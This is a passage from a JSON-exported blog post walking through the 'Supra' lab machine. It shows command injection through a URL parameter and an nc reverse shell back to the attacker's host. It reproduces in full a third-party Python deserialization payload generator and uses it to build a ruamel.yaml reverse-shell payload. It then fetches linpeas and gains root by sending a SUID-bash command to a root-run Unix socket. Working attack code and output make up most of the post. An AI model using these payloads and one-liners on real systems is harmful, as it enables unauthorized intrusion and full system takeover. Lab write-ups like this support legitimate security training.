0.0      0     0 ?        S    02:09   0:00 [card0-crtc4]\nroot         291  0.0  0.0      0     0 ?        S    02:09   0:00 [card0-crtc5]\nroot         292  0.0  0.0      0     0 ?        
S    02:09   0:00 [card0-crtc6]\nroot         293  0.0  0.0      0     0 ?        S    02:09   0:00 [card0-crtc7]\nroot         381  0.0  0.2  99824  5828 ?        Ssl  02:09   0:00 \/sbin\/dhclient -4 -v -i -pf \/run\/dhclient.enp0s3.pid -lf \/var\/lib\/dhcp\/dhclient.enp0s3.leases -I -df \/var\/lib\/dhcp\/dhclient6.enp0s3.leases enp0s3\nroot         382  0.0  0.1   6684  2848 ?        Ss   02:09   0:00 \/usr\/sbin\/cron -f\nroot         386  0.0  0.2 220740  6032 ?        Ssl  02:09   0:00 \/usr\/sbin\/rsyslogd -n -iNONE\nroot         387  0.0  0.1   6756  3116 ?        Ss   02:09   0:00 \/bin\/bash \/root\/.s\/starts.sh\nroot         389  0.0  0.2  21536  5528 ?        Ss   02:09   0:00 \/lib\/systemd\/systemd-logind\nroot         390  0.0  0.2  14560  4944 ?        Ss   02:09   0:00 \/sbin\/wpa_supplicant -u -s -O \/run\/wpa_supplicant\nroot         416  0.0  0.4  16396  9844 ?        S    02:09   0:00 python3 socket-root.py\nroot         433  0.0  0.0   5784  1628 tty1     Ss+  02:09   0:00 \/sbin\/agetty -o -p -- \\u --noclear tty1 linux\nroot         697  0.0  0.3  13292  7104 ?        Ss   02:09   0:00 sshd: \/usr\/sbin\/sshd -D [listener] 0 of 10-100 startups\nroot         710  0.0  0.9 193784 19692 ?        Ss   02:09   0:00 \/usr\/sbin\/apache2 -k start\nroot         794  0.0  0.0      0     0 ?        I    02:14   0:00 [kworker\/0:1-ata_sff]\nroot         798  0.0  0.0      0     0 ?        I    02:15   0:00 [kworker\/u2:1-flush-8:0]\nwww-data     799  0.0  0.0   2420   576 ?        S    02:16   0:00 \/bin\/sh -c ps aux | grep root\nwww-data     801  0.0  0.0   6312   652 ?        
S    02:16   0:00 grep root\n :: root<\/code><\/pre>\n<p>Try executing system commands:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root|whoami;id&quot;\nstdout: www-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n :: root|whoami;id<\/code><\/pre>\n<p>Try a reverse shell:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root|nc+-e+\/bin\/bash+192.168.10.104+1234&quot;<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537905.png\" alt=\"image-20240809141839528\" \/><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@Supra:\/var\/www\/api$ ls -la\ntotal 132\ndrwxr-xr-x   5 root     root       4096 Oct 10  2021 .\ndrwxr-xr-x   4 root     root       4096 Oct 10  2021 ..\n-rw-r--r--   1 root     root       3666 Oct 10  2021 app.js\ndrwxr-xr-x 149 root     root       4096 Oct 12  2021 node_modules\n-rw-r--r--   1 root     root        432 Oct 12  2021 package.json\n-rw-r--r--   1 root     root    
 101932 Oct 12  2021 package-lock.json\n-rwxr-xr-x   1 root     root         24 Oct 10  2021 start.sh\ndrwxr-xr-x   2 www-data www-data   4096 Aug  9 00:20 uploads\ndrwxr-xr-x   2 root     root       4096 Oct 10  2021 views\n(remote) www-data@Supra:\/var\/www\/api$ cat start.sh \n#!\/bin\/bash\nnode app.js\n(remote) www-data@Supra:\/var\/www\/api$ cat package.json \n{\n  &quot;name&quot;: &quot;api&quot;,\n  &quot;version&quot;: &quot;1.0.0&quot;,\n  &quot;description&quot;: &quot;&quot;,\n  &quot;main&quot;: &quot;app.js&quot;,\n  &quot;scripts&quot;: {\n    &quot;test&quot;: &quot;echo \\&quot;Error: no test specified\\&quot; &amp;&amp; exit 1&quot;\n  },\n  &quot;keywords&quot;: [],\n  &quot;author&quot;: &quot;&quot;,\n  &quot;license&quot;: &quot;ISC&quot;,\n  &quot;dependencies&quot;: {\n    &quot;ejs&quot;: &quot;^3.1.6&quot;,\n    &quot;express&quot;: &quot;^4.17.1&quot;,\n    &quot;generate-password&quot;: &quot;^1.6.1&quot;,\n    &quot;ip-regex&quot;: &quot;^4.3.0&quot;,\n    &quot;multer&quot;: &quot;^1.4.3&quot;,\n    &quot;node-xwhois&quot;: &quot;^2.0.10&quot;,\n    &quot;nodejs-base64&quot;: &quot;^2.0.0&quot;\n  }\n}\n(remote) www-data@Supra:\/var\/www\/api$ sudo -l\nbash: sudo: command not found\n(remote) www-data@Supra:\/var\/www\/api$ ls -la \/home\/it404\/\ntotal 24\ndrwxr-xr-x  2 it404 it404 4096 Oct 12  2021 .\ndrwxr-xr-x  3 root  root  4096 Oct  6  2021 ..\n-rw-r--r--  1 it404 it404  220 Oct  6  2021 .bash_logout\n-rw-r--r--  1 it404 it404 3526 Oct  6  2021 .bashrc\n-rw-r-----+ 1 root  root    32 Oct 12  2021 local.txt\n-rw-r--r--  1 it404 it404  807 Oct  6  2021 .profile<\/code><\/pre>\n<h3>Checking the file's ACLs<\/h3>\n<p>There is a plus sign in the listing, which clearly means an ACL is set; let's see what it contains:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@Supra:\/home\/it404$ getfacl local.txt \n# file: local.txt\n# owner: root\n# group: 
root\nuser::rw-\nuser:it404:r--\ngroup::---\nmask::r--\nother::---\n(remote) www-data@Supra:\/home\/it404$ cat \/etc\/group | grep user\nusers:x:100:\n(remote) www-data@Supra:\/home\/it404$ cat \/etc\/group | grep mask<\/code><\/pre>\n<h3>Deserialization + YAML to escalate to user privileges<\/h3>\n<p>Nothing gained there; note it down for now and look at other information:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@Supra:\/home\/it404$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/sbin\/exim4\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/mount\n(remote) www-data@Supra:\/home\/it404$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@Supra:\/home\/it404$ ss -tlunp\nNetid              State               Recv-Q              Send-Q                           Local Address:Port                           Peer Address:Port              Process              \nudp                UNCONN              0                   0                                      0.0.0.0:68                                  0.0.0.0:*                                      \ntcp                LISTEN              0                   128                                  127.0.0.1:8081                                0.0.0.0:*                                      \ntcp                LISTEN              0                   128                                    0.0.0.0:22                                  0.0.0.0:*                                      \ntcp                LISTEN              0                   20                                   127.0.0.1:25                                  0.0.0.0:*                                      \ntcp                LISTEN              0                   511                               
           *:80                                        *:*                                      \ntcp                LISTEN              0                   128                                       [::]:22                                     [::]:*                                      \ntcp                LISTEN              0                   20                                       [::1]:25                                     [::]:*                                      \ntcp                LISTEN              0                   511                                          *:4000                                      *:*                  users:((&quot;node&quot;,pid=415,fd=18))<\/code><\/pre>\n<p>Port <code>25<\/code> and port <code>8081<\/code> are open only on the internal interface; let's see what they expose:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@Supra:\/home\/it404$ ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:f5:94:be brd ff:ff:ff:ff:ff:ff\n    inet 192.168.10.103\/24 brd 192.168.10.255 scope global dynamic enp0s3\n       valid_lft 6066sec preferred_lft 6066sec\n    inet6 fd00:4c10:d50a:f900:a00:27ff:fef5:94be\/64 scope global dynamic mngtmpaddr \n       valid_lft 86257sec preferred_lft 14257sec\n    inet6 fe80::a00:27ff:fef5:94be\/64 scope link \n       valid_lft forever preferred_lft forever\n(remote) www-data@Supra:\/home\/it404$ cd \/\n(remote) www-data@Supra:\/$ ls -la\ntotal 68\ndrwxr-xr-x  18 root root  4096 Oct  6  2021 .\ndrwxr-xr-x  18 
root root  4096 Oct  6  2021 ..\nlrwxrwxrwx   1 root root     7 Oct  6  2021 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root  4096 Oct  6  2021 boot\ndrwxr-xr-x  17 root root  3140 Aug  9 02:07 dev\ndrwxr-xr-x  86 root root  4096 Aug  9 02:07 etc\ndrwxr-xr-x   3 root root  4096 Oct  6  2021 home\nlrwxrwxrwx   1 root root    30 Oct  6  2021 initrd.img -&gt; boot\/initrd.img-5.10.0-8-amd64\nlrwxrwxrwx   1 root root    30 Oct  6  2021 initrd.img.old -&gt; boot\/initrd.img-5.10.0-8-amd64\nlrwxrwxrwx   1 root root     7 Oct  6  2021 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Oct  6  2021 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root     9 Oct  6  2021 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root    10 Oct  6  2021 libx32 -&gt; usr\/libx32\ndrwx------   2 root root 16384 Oct  6  2021 lost+found\ndrwxr-xr-x   3 root root  4096 Oct  6  2021 media\ndrwxr-xr-x   2 root root  4096 Oct  6  2021 mnt\ndrwxr-xr-x   3 root root  4096 Oct 11  2021 opt\ndr-xr-xr-x 149 root root     0 Aug  9 01:38 proc\ndrwx------   6 root root  4096 Oct 12  2021 root\ndrwxr-xr-x  18 root root   520 Aug  9 02:07 run\nlrwxrwxrwx   1 root root     8 Oct  6  2021 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root  4096 Oct  6  2021 srv\ndr-xr-xr-x  13 root root     0 Aug  9 01:38 sys\ndrwxrwxrwt  10 root root  4096 Aug  9 02:14 tmp\ndrwxr-xr-x  14 root root  4096 Oct  6  2021 usr\ndrwxr-xr-x  12 root root  4096 Oct  6  2021 var\nlrwxrwxrwx   1 root root    27 Oct  6  2021 vmlinuz -&gt; boot\/vmlinuz-5.10.0-8-amd64\nlrwxrwxrwx   1 root root    27 Oct  6  2021 vmlinuz.old -&gt; boot\/vmlinuz-5.10.0-8-amd64\n(remote) www-data@Supra:\/$ cd opt\n(remote) www-data@Supra:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Oct 11  2021 .\ndrwxr-xr-x 18 root root 4096 Oct  6  2021 ..\ndrwxr-xr-x  2 root root 4096 Oct 12  2021 api\n(remote) www-data@Supra:\/opt$ cd api\/\n(remote) www-data@Supra:\/opt\/api$ ls -la\ntotal 20\ndrwxr-xr-x 2 root     root     4096 Oct 12  2021 .\ndrwxr-xr-x 3 root     root  
   4096 Oct 11  2021 ..\n-rwxrwxrwx 1 www-data www-data  445 Oct 11  2021 accounts.yaml\n-rw-r--r-- 1 root     root      609 Oct 12  2021 internal-api.py\n-rwxr-xr-x 1 root     root       36 Oct 11  2021 start-internal.sh\n(remote) www-data@Supra:\/opt\/api$ cat start-internal.sh \n#!\/bin\/bash\npython3 internal-api.py\n(remote) www-data@Supra:\/opt\/api$ cat accounts.yaml \nemails:\n\n  - Gloriawrong@zonnetd.nl\n  - cheerfulMark93@atbt.net\n  - horribleMicheal30@aliceaedsl.fr\n  - Tamaradull@aiam.com\n  - Grantitchy@lieve.ca\n  - easyAngelica60@heatnet.nl\n  - Rebekaheasy@lieve.com\n  - zealousKatelyn@ggmail.com\n  - depressedBridget62@yahooi.com.ar\n  - fierceBrooke@optoniline.net\n\npasswords:\n\n  - 6NpjqVCM\n  - mzPdgc9V\n  - fpRze8bn\n  - x4Lm3W6M\n  - tYUBN6Qx\n  - 8zNBxXcd\n  - X48UYKrw\n  - xEfjB39C\n  - Wk956r4a\n  - UKQC5q2a(remote) www-data@Supra:\/opt\/api$ cat internal-api.py \nfrom flask import Flask, request\n#import yaml\nimport ruamel.yaml\nimport warnings\nfrom base64 import b64decode\n\nwarnings.simplefilter(&#039;ignore&#039;, ruamel.yaml.error.UnsafeLoaderWarning)\n\nfrom yaml.loader import FullLoader\napp = Flask(__name__)\n\n@app.route(&quot;\/&quot;, methods=[&quot;GET&quot;])\ndef index():\n    return &quot;Supra Internals&quot;\n\n@app.route(&quot;\/read-leaked-accounts&quot;, methods=[&quot;GET&quot;])\ndef read():\n    with open(r&#039;.\/accounts.yaml&#039;) as file:\n        #accounts = yaml.load(file, Loader=FullLoader)\n        accounts = ruamel.yaml.load(file)\n    return accounts\n\nif __name__ == &#039;__main__&#039;:\n    app.run(&quot;127.0.0.1&quot;, port=8081)<\/code><\/pre>\n<p>Found the code, and <code>accounts.yaml<\/code> is writable; let's see whether the config file can be hijacked to do something.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537906.png\" alt=\"image-20240809143213416\" \/><\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/deserialization\/python-yaml-deserialization\">https:\/\/book.hacktricks.xyz\/pentesting-web\/deserialization\/python-yaml-deserialization<\/a><\/p>\n<p>Let's test whether this can be abused:<\/p>\n<pre><code class=\"language-python\">import yaml\nfrom yaml import UnsafeLoader, FullLoader, Loader\nimport subprocess\n\nclass Payload(object):\n    def __reduce__(self):\n        return (subprocess.Popen,(&#039;ls&#039;,))\n\ndeserialized_data = yaml.dump(Payload()) # serializing data\nprint(deserialized_data)\n\n#!!python\/object\/apply:subprocess.Popen\n#- ls\n\nprint(yaml.load(deserialized_data, Loader=UnsafeLoader))\nprint(yaml.load(deserialized_data, Loader=Loader))\nprint(yaml.unsafe_load(deserialized_data))\n\n# python3 exp.py\n# !!python\/object\/apply:subprocess.Popen\n# - ls\n\n# &lt;Popen: returncode: None args: &#039;ls&#039;&gt;\n# exp.py  exp.sh  result.txt\n# exp.py  exp.sh  result.txt\n# &lt;Popen: returncode: None args: &#039;ls&#039;&gt;\n# &lt;Popen: returncode: None args: &#039;ls&#039;&gt;\n# exp.py  exp.sh  
result.txt<\/code><\/pre>\n<p>But the result was not good; maybe I used it wrong. Let's try a script someone else wrote: <a href=\"https:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator\">https:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator<\/a><\/p>\n<pre><code class=\"language-python\"># Python Deserialization attack payload file generator for pickle ,pyYAML, ruamel.yaml and jsonpickle module by j0lt\n# Requirements : Python 3.x , modules jsonpickle, pyyaml\n# Version : 2.3\n# Usage : python peas.py\n\nimport pickle\nfrom base64 import b64encode, b64decode\nimport jsonpickle\nimport yaml\nimport subprocess\nfrom copy import deepcopy\n\nclass Gen(object):\n    def __init__(self, payload):\n        self.payload = payload\n\n    def __reduce__(self):\n        return subprocess.Popen, (self.payload,)\n\nclass Payload(object):\n\n    def __init__(self, c, location, base, os):\n        self.location = location\n        self.base = base\n        self.os = os\n        self.prefix = &#039;&#039; if self.os == &#039;linux&#039; else &quot;cmd.exe \/c &quot;\n        self.cmd = self.prefix+c\n        self.payload = b&#039;&#039;\n        self.quotes = True if &quot;\\&#039;&quot; in self.cmd or &quot;\\&quot;&quot; in self.cmd else False\n\n    def pick(self):\n        self.payload = pickle.dumps(Gen(tuple(self.case().split(&quot; &quot;))))\n        self.payload = self.verifyencoding()\n        self.savingfile(&quot;_pick&quot;)\n\n    def ya(self):\n        if self.quotes:\n            self.payload = b64decode(&quot;ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0g&quot;\n                                     &quot;cHl0aG9uCiAgLSAtYwogIC0gIl9faW1wb3J0X18oJ29zJykuc3lzdGVtKHN0cihfX2ltcG9ydF9fKCdiY&quot;\n                                     &quot;XNlNjQnKS5iNjRkZWNvZGUoJw==&quot;) + b64encode(bytes(self.cmd, 
&#039;utf-8&#039;)) + \\\n                           b64decode(&quot;JykuZGVjb2RlKCkpKSI=&quot;)\n        else:\n            self.payload = bytes(yaml.dump(Gen(tuple(self.cmd.split(&quot; &quot;)))), &#039;utf-8&#039;)\n        self.payload = self.verifyencoding()\n        self.savingfile(&quot;_yaml&quot;)\n\n    def js(self):\n        self.payload = bytes(jsonpickle.encode(Gen(tuple(self.case().split(&quot; &quot;)))),\n                             &#039;utf-8&#039;)\n        self.payload = self.verifyencoding()\n        self.savingfile(&quot;_jspick&quot;)\n\n    def __add__(self, other):\n        return self + other\n\n    def verifyencoding(self):\n        return b64encode(self.payload) if self.base else self.payload\n\n    def savingfile(self, suffix):\n        open(self.location.__add__(suffix), &quot;wb&quot;).write(self.payload)\n\n    def chr_encode(self, data):\n        d = &#039;+&#039;.join([&#039;chr(&#039;+str(ord(ii))+&#039;)&#039; for ii in data])\n        return d\n\n    def case(self):\n        cmd = deepcopy(self.cmd)\n        if self.quotes:\n            cmd = self.prefix+&quot;python -c exec({})&quot;.format(self.chr_encode(&quot;__import__(&#039;os&#039;).system&quot;\n                                                                               &quot;(__import__(&#039;base64&#039;).b64decode({})&quot;\n                                                                              &quot;.decode(&#039;utf-8&#039;))&quot;.\n                                                                               format(b64encode(bytes(self.cmd, &#039;utf-8&#039;)\n                                                                                                ))))\n        return cmd \n\nif __name__ == &quot;__main__&quot;:\n    cmd = input(&quot;Enter RCE command :&quot;)\n    o = &#039;linux&#039; if input(&quot;Enter operating system of target [linux\/windows] . 
Default is linux :&quot;).lower() != &quot;windows&quot; \\\n        else &#039;windows&#039;\n    b = True if input(&quot;Want to base64 encode payload ? [N\/y] :&quot;).lower() == &quot;y&quot; else False\n    p = Payload(cmd, input(&quot;Enter File location and name to save :&quot;), b, o)\n    funtiondict = {&quot;pickle&quot;: p.pick, &quot;pyyaml&quot;: p.ya, &quot;ruamel.yaml&quot;: p.ya, &quot;jsonpickle&quot;: p.js}\n    while 1:\n        module = input(&quot;Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :&quot;).lower()\n        if module in funtiondict.keys():\n            funtiondict[module]()\n            break\n        elif module == &quot;all&quot;:\n            for i in funtiondict.keys():\n                funtiondict[i]()\n            break\n        else:\n            print(&quot;Wrong Input &quot;)\n            continue\n    print(&quot;Done Saving file !!!!&quot;)<\/code><\/pre>\n<p>First install the libraries it needs:<\/p>\n<pre><code class=\"language-text\"># requirements.txt\njsonpickle==1.2\nPyYAML==5.1.2<\/code><\/pre>\n<p>Then generate the payload:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ python3 peas.py                   \nEnter RCE command :nc -e \/bin\/bash 192.168.10.104 2345\nEnter operating system of target [linux\/windows] . Default is linux :\nWant to base64 encode payload ? 
[N\/y] :N\nEnter File location and name to save :.\/badcode\nSelect Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :ruamel.yaml\nDone Saving file !!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ ls -la\ntotal 604\ndrwxr-xr-x   2 kali kali   4096 Aug  9 02:53 .\ndrwxr-xr-x 121 kali kali   4096 Aug  9 01:06 ..\n-rw-r--r--   1 kali kali    114 Aug  9 02:53 badcode_yaml\n-rw-r--r--   1 kali kali    457 Aug  9 02:43 exp.py\n-rwxr-xr-x   1 kali kali    396 Aug  9 01:12 exp.sh\n-rwxr-xr-x   1 kali kali   3806 Aug  9 02:50 peas.py\n-rw-r--r--   1 kali kali 593134 Aug  9 01:22 result.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ cat badcode_yaml                  \n!!python\/object\/apply:subprocess.Popen\n- !!python\/tuple\n  - nc\n  - -e\n  - \/bin\/bash\n  - 192.168.10.104\n  - &#039;2345&#039;<\/code><\/pre>\n<p>First set up port forwarding so the service can be reached from outside:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@Supra:\/opt\/api$ socat TCP-LISTEN:8082,fork TCP:127.0.0.1:8081 &amp;\n[1] 1157<\/code><\/pre>\n<p>Then, after placing the payload, try accessing the endpoint:<\/p>\n<pre><code class=\"language-bash\"># http:\/\/192.168.10.103:8082\/read-leaked-accounts\nInternal Server Error\nThe server encountered an internal error and was unable to complete your request. 
Either the server is overloaded or there is an error in the application.<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537907.png\" alt=\"image-20240809150620845\" \/><\/p>\n<h3>Escalating to root via socket.s<\/h3>\n<p>Try uploading <code>linpeas.sh<\/code> to enumerate:<\/p>\n<pre><code class=\"language-bash\">(remote) it404@Supra:\/tmp$ wget http:\/\/192.168.10.104:8888\/linpeas.sh\n(remote) it404@Supra:\/tmp$ chmod +x linpeas.sh\n(remote) it404@Supra:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n<p>It found:<\/p>\n<pre><code class=\"language-bash\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 SGID\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#sudo-and-suid\n-rwxr-sr-x 1 root shadow 38K Jul  9  2021 \/usr\/sbin\/unix_chkpwd\n-rwxr-sr-x 1 root mail 23K Feb  4  2021 \/usr\/bin\/dotlockfile\n-rwxr-sr-x 1 root crontab 43K Feb 22  2021 \/usr\/bin\/crontab\n-rwxr-sr-x 1 root tty 35K Jul 28  2021 \/usr\/bin\/wall\n-rwxr-sr-x 1 root root 15K Nov 19  2020 \/usr\/bin\/dotlock.mailutils\n-rwxr-sr-x 1 root shadow 31K Feb  7  2020 \/usr\/bin\/expiry\n-rwxr-sr-x 1 root tty 23K Jul 28  2021 \/usr\/bin\/write.ul (Unknown SGID binary)\n-rwxr-sr-x 1 root shadow 79K Feb  7  2020 \/usr\/bin\/chage\n-rwxr-sr-x 1 root ssh 
347K Mar 13  2021 \/usr\/bin\/ssh-agent\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Files with ACLs (limited to 50)\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#acls\n# file: \/home\/\/it404\/local.txt\nUSER   root      rw-     \nuser   it404     r--     \nGROUP  root      ---     \nmask             r--     \nother            ---     \n\n# file: \/usr\/local\/src\/socket.s\nUSER   root      rwx     \nuser   it404     rwx     \nGROUP  root      r-x     \nmask             rwx     \nother            r-x<\/code><\/pre>\n<p>Found a socket with suid set; let's see whether it can be used for privilege escalation:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537908.png\" alt=\"image-20240809153515978\" \/><\/p>\n<p>Escalate privileges: <a href=\"https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/socket-command-injection\">https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/socket-command-injection<\/a><\/p>\n<pre><code class=\"language-bash\">(remote) it404@Supra:\/tmp$ netstat -a -p --unix | grep socket\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive UNIX domain sockets 
(servers and established)\nunix  2      [ ACC ]     STREAM     LISTENING     11938    -                    \/usr\/local\/src\/socket.s\nunix  6      [ ]         DGRAM                    10633    -                    \/run\/systemd\/journal\/socket\nunix  2      [ ACC ]     STREAM     LISTENING     11417    -                    \/run\/dbus\/system_bus_socket\nunix  3      [ ]         STREAM     CONNECTED     11668    -                    \/run\/dbus\/system_bus_socket\nunix  3      [ ]         STREAM     CONNECTED     11651    -                    \/run\/dbus\/system_bus_socket\nunix  3      [ ]         STREAM     CONNECTED     11652    -                    \/run\/dbus\/system_bus_socket\nunix  3      [ ]         STREAM     CONNECTED     11653    -                    \/run\/dbus\/system_bus_socket\n(remote) it404@Supra:\/tmp$ echo &quot;cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash; chmod +x \/tmp\/bash;&quot; | socat - UNIX-CLIENT:\/usr\/local\/src\/socket.s\n(remote) it404@Supra:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Aug  4  2021 \/bin\/bash\n(remote) it404@Supra:\/tmp$ ls -la \/tmp\/bash\n-rwsr-sr-x 1 root root 1234376 Aug  9 03:36 \/tmp\/bash\n(remote) it404@Supra:\/tmp$ \/tmp\/bash -p\n(remote) root@Supra:\/tmp# cd ~\n(remote) root@Supra:\/home\/it404# cd \/root\n(remote) root@Supra:\/root# ls -la\ntotal 40\ndrwx------  6 root root 4096 Oct 12  2021 .\ndrwxr-xr-x 18 root root 4096 Oct  6  2021 ..\n-rw-------  1 root root  475 Oct 12  2021 .bash_history\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 Oct 11  2021 .cache\ndrwxr-xr-x  3 root root 4096 Oct 10  2021 .local\ndrwxr-xr-x  3 root root 4096 Oct  6  2021 .npm\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root   32 Oct 12  2021 proof.txt\ndrwxr-xr-x  2 root root 4096 Oct 12  2021 .s\n(remote) root@Supra:\/root# cd .s\n(remote) root@Supra:\/root\/.s# ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Oct 12  2021 .\ndrwx------ 6 
root root 4096 Oct 12  2021 ..\n-rw-r--r-- 1 root root  495 Oct 12  2021 socket-root.py\n-rw-r--r-- 1 root root   35 Oct 12  2021 starts.sh\n(remote) root@Supra:\/root\/.s# cat socket-root.py \nimport socket\nimport os, os.path\nimport time\nfrom collections import deque    \n\nif os.path.exists(&quot;\/usr\/local\/src\/socket.s&quot;):\n  os.remove(&quot;\/usr\/local\/src\/socket.s&quot;)    \n\nserver = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\nserver.bind(&quot;\/usr\/local\/src\/socket.s&quot;)\nos.system(&quot;setfacl -m u:it404:rwx \/usr\/local\/src\/socket.s&quot;)\nwhile True:\n  server.listen(1)\n  conn, addr = server.accept()\n  datagram = conn.recv(1024)\n  if datagram:\n    print(datagram)\n    os.system(datagram)\n    conn.close()\n(remote) root@Supra:\/root\/.s# cat starts.sh \n#!\/bin\/bash\npython3 socket-root.py<\/code><\/pre>\n<p>Got root!<\/p>\n<h2>Extra takeaways<\/h2>\n<h3>How to find files with ACLs<\/h3>\n<pre><code class=\"language-bash\">getfacl -t -s -R -p \/bin \/etc \/home \/opt \/root \/sbin \/usr \/tmp 2&gt;\/dev\/null\n\n# file: \/home\/it404\/local.txt\nUSER   root      rw-     \nuser   it404     r--     \nGROUP  root      ---     \nmask             r--     \nother            ---     \n\n# file: \/usr\/local\/src\/socket.s\nUSER   root      rwx     \nuser   it404     rwx     \nGROUP  root      r-x     \nmask             rwx     \nother            r-x<\/code><\/pre>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV18t421w72D\/\">https:\/\/www.bilibili.com\/video\/BV18t421w72D\/<\/a><\/p>\n<p><a href=\"https:\/\/al1enum.github.io\/docs\/Supra.pdf\">https:\/\/al1enum.github.io\/docs\/Supra.pdf<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Supra Information gathering Port scan \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra] \u2514\u2500$ rusts 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-777","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/777","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=777"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/777\/revisions"}],"predecessor-version":[{"id":778,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/777\/revisions\/778"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=777"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=777"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=777"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}